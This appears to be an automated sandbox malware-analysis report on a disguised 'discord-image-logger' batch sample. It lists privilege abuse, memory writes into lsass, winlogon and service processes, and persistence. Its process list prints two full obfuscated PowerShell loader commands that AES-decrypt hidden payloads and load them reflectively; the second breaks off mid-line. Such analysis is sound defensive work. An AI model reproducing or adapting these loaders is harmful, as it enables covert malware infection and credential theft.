N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3940 wrote to memory of 1440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3940 wrote to memory of 1440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1440 wrote to memory of 1892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1440 wrote to memory of 1892 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3940 wrote to memory of 4252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
PID 3940 wrote to memory of 4252 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
PID 4252 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 4252 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 4252 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 4252 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 4252 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 4252 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 4252 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\System32\dllhost.exe
PID 4252 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\$sxr-powershell.exe
PID 4252 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe C:\Windows\$sxr-powershell.exe
PID 4128 wrote to memory of 2716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 2716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 2716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 2716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 2716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 2716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 2716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 5104 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 4128 wrote to memory of 5104 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 4128 wrote to memory of 3728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 3728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 3728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 3728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 3728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 3728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 3728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 3728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4128 wrote to memory of 3728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3728 wrote to memory of 588 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3728 wrote to memory of 676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3728 wrote to memory of 964 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 316 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3728 wrote to memory of 428 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 960 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1144 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1156 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1152 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1172 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1312 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1356 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1420 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1612 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1632 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1644 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1724 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1760 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1772 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1896 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1976 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1992 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1428 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1544 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 2060 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 2168 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 3728 wrote to memory of 2248 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 2396 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 2512 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe

"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{29e3a377-95a0-4802-8a48-ee3233688157}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 